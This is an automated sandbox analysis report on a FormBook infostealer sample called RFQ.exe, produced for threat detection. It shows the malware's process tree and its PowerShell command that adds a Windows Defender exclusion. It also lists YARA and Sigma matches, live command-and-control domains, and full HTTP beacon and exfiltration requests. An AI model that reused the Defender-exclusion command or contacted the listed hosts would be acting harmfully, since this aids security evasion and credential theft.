Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name:RFQ.exe
Analysis ID:1426618
MD5:4d82cc1b35b8dc9ec7d149f1b8b95e95
SHA1:a1d363742603070b3fc7d2db4fc431307618b1b8
SHA256:eedd6d6a9ec4bf82ca87e66c1ae5b86983e8479598df71f3602283b93dd07035
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 4D82CC1B35B8DC9EC7D149F1B8B95E95)
    • powershell.exe (PID: 5776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • RFQ.exe (PID: 3580 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 4D82CC1B35B8DC9EC7D149F1B8B95E95)
      • KdNqCjDpwdLOuI.exe (PID: 5444 cmdline: "C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • icacls.exe (PID: 3140 cmdline: "C:\Windows\SysWOW64\icacls.exe" MD5: 2E49585E4E08565F52090B144062F97E)
          • KdNqCjDpwdLOuI.exe (PID: 2940 cmdline: "C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2d583:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16b92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x29e50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1345f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.RFQ.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.RFQ.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d583:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16b92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.RFQ.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.RFQ.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2c783:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x15d92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 4464, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", ProcessId: 5776, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 4464, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", ProcessId: 5776, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 4464, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe", ProcessId: 5776, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: RFQ.exeVirustotal: Detection: 29%Perma Link
            Source: RFQ.exeReversingLabs: Detection: 18%
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: RFQ.exeJoe Sandbox ML: detected
            Source: RFQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: RFQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: icacls.pdb source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431314458.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431191705.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: icacls.pdbGCTL source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ.exe, RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030DB130 FindFirstFileW,FindNextFileW,FindClose,8_2_030DB130
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 4x nop then xor eax, eax8_2_030C90E0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 4x nop then pop edi8_2_030D16E4
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 4x nop then pop edi8_2_030CD4A0

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.book-of-degen.xyz
            Source: DNS query: www.fusionndustries.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.117 91.195.240.117
            Source: Joe Sandbox ViewIP Address: 66.96.162.136 66.96.162.136
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ== HTTP/1.1Host: www.elysiangame.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=k/xiXeKkElN9lmj7tVr8idaf/wpGLS/XfVixYgRWGr55oYC/zYvRgJVTIR6Icyf7C+fnrNLi6yuD3OJtT3FnzryZpasAqgaz10+v5QpHvKqHjO9njldZ1cZrBWCORkcOsw== HTTP/1.1Host: www.collegeclubapparel.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=J5sdn6UHwrTFsLl7PSE+273sNdFQMS+e/Eepb66AdUMKjr/OxnnLPWtAHrBNDsqMNKwlUYW9tPjJnamC/Yv4erSiZvDT3TM3BG/s9HlMNwb39HB/smoNNYSAbH35aGk1gA==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.vvbgsekbo.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=23UPPxRjGSNUJTgmtj2qEyLz/ntkvqKRRFHtLj5W9bo9CLdZgto2DYnNUhYakwcl0jYhNZjG9CPBZRuAkcQvlwifYrEIa7IdBg/GlOURZYl7vwvnI0pSC8vNdE3Ml+j1JA== HTTP/1.1Host: www.mytemplotech.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=zdwoT+oWWlgyDxCB5HfbKl0ceeCoMM1WsfXRj0lrAfPT+1DsmzcZqVZ0gwFwp9Re8dyKn5b7kYDBw8FcuEN9m4nkKjfCAjjkfqKhmamnNO4NqnkVPKDFVPgTCNPXruJSGA==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.othlastore.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=90cL6Q+hnzVn1nW1iqhU1H7cWV3fvz6SaIERCijRkAMfp+TQya0GlzYPpQzULEJqUDrLh9Kv8LQV8OdLSWJ6ERPfs+zhKb8B6PZEz280PNZ5UlofhaQwyuwHrpNW2TXV5g== HTTP/1.1Host: www.book-of-degen.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=xJEpvmsSZWMn08k0fswZUF3i8FJV6XmZDE9zwebvcwnWaSyOd7ieKTZxqd8LfY736VbykJAs8QtIZUIve9rpP7hx1kot6ym/I/JMbr2a3NM5FLBwcSvbdBi7Xsx3rbBzJg==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.fusionndustries.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=BPQNeXp4G99ixa42Ae2HhZRkmtmfIWoN8C4XxZZLRtTgWub9dK20l7PCUAY7izqtYkjPPbLJsAPTHyCf3Tn8bJnCF1PYC6i+wP1GhXiXOwtWSBMDP4vgP+g0mku5o7pd9Q== HTTP/1.1Host: www.66bm99.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/+EdJo2t+tokAsIL/Mwf8dbmtfOzyBKuFYSi0CvpWL7by1S5GZC5tkYq+xKghYmLhmWFfGXtgNdAY2BZgRg==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.wedgetechflash.co.keAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=N6yreUGrEwmnZyuRuhm7fu2pjjSQdKU6BgmK3dVc5hhl4QdzezeViDhR5sAjVdDUmsLMRcLdrvPdYjLD7b1ZIx3A1Z1l9931wLtzigwrLlFKueBnJaM0qh412Fe43461Qw== HTTP/1.1Host: www.ojyphyi.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=dFo211Ya6GQqvQphJd5Z9kXpbZuBKAdHlLq9NOD/jOOiJZxFh2qZdwUu6l5GM/Gcb7yTWO1JQ6ZPaNdZMdh+co6vneivRci+mW27rS4RiRuWVEkpVXbIIudDxuuJlDWajg== HTTP/1.1Host: www.myspinpods.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=6OoDw3xNyuUxCb7SO8/wQWyB7gJcoYv4ZTaI1h51IYF+sVRVSOMOuR9r6Rx19mFv7TRZYpTQN5hhg3dhUB7GRpmcej2viG1w8/6TMbbBsdyRJnmf1CwT9GI+x7zG1LG56Q==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.seatheskydesign.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=UMNiUc6XIv/d2uC7IlFmdfXYbiB/0cGyF5nVzLNzjfRVEsK0zJlkeP+z5Z1MT37PYueGSacB+keqYnFu3S8ymlT8yqaJ/dNBtni0ghgK1oHFbUR/jwcWs7rz0kpYku2gKQ== HTTP/1.1Host: www.naglissere.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ== HTTP/1.1Host: www.elysiangame.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnz5/?gr=Z7N7hXY/vxItmyrXNQB4LENYEQnuSZ4/X1tSw0B7uFqoJtXe6IwXeXQiXEM/Xr4/ado0xvKOz5lKhVT9TZmVC0ntJKIXA1qlQqDuwiNLRNgNzKASDET1ivmJ23BpeRNTPw==&kFGTX=Q6OxIXo8tXD HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: unknownDNS traffic detected: queries for: www.elysiangame.online
            Source: unknownHTTP traffic detected: POST /bnz5/ HTTP/1.1Host: www.blueberry-breeze.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Connection: closeContent-Length: 203Content-Type: application/x-www-form-urlencodedOrigin: http://www.blueberry-breeze.comReferer: http://www.blueberry-breeze.com/bnz5/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 67 72 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 71 47 57 71 4b 52 39 63 50 68 6c 78 45 6c 32 55 63 35 41 6d 62 46 70 65 36 33 34 32 6a 31 47 6e 4d 4e 66 75 78 76 77 4a 57 6b 46 2b 49 6b 6b 6a 66 76 67 39 52 74 41 67 6b 71 4f 57 6e 59 35 72 68 55 54 2f 63 63 76 78 50 45 62 31 57 2f 55 68 55 31 71 44 48 38 2b 48 37 6d 4d 64 65 38 5a 4c 32 36 41 51 59 30 76 74 68 50 71 34 6a 45 64 31 44 78 63 41 57 48 34 34 55 72 6b 79 31 52 6b 70 44 66 4c 63 33 31 31 74 6e 65 52 4e 6c 72 30 7a 63 6c 5a 65 59 35 4e 43 68 36 6b 6d 6a 4f 4f 49 74 67 50 4f 53 52 52 57 47 68 79 36 6b 36 71 49 54 31 6f 4e 67 51 6c 39 67 58 41 3d Data Ascii: gr=U5lbigM/lzYTqGWqKR9cPhlxEl2Uc5AmbFpe6342j1GnMNfuxvwJWkF+Ikkjfvg9RtAgkqOWnY5rhUT/ccvxPEb1W/UhU1qDH8+H7mMde8ZL26AQY0vthPq4jEd1DxcAWH44Urky1RkpDfLc311tneRNlr0zclZeY5NCh6kmjOOItgPOSRRWGhy6k6qIT1oNgQl9gXA=
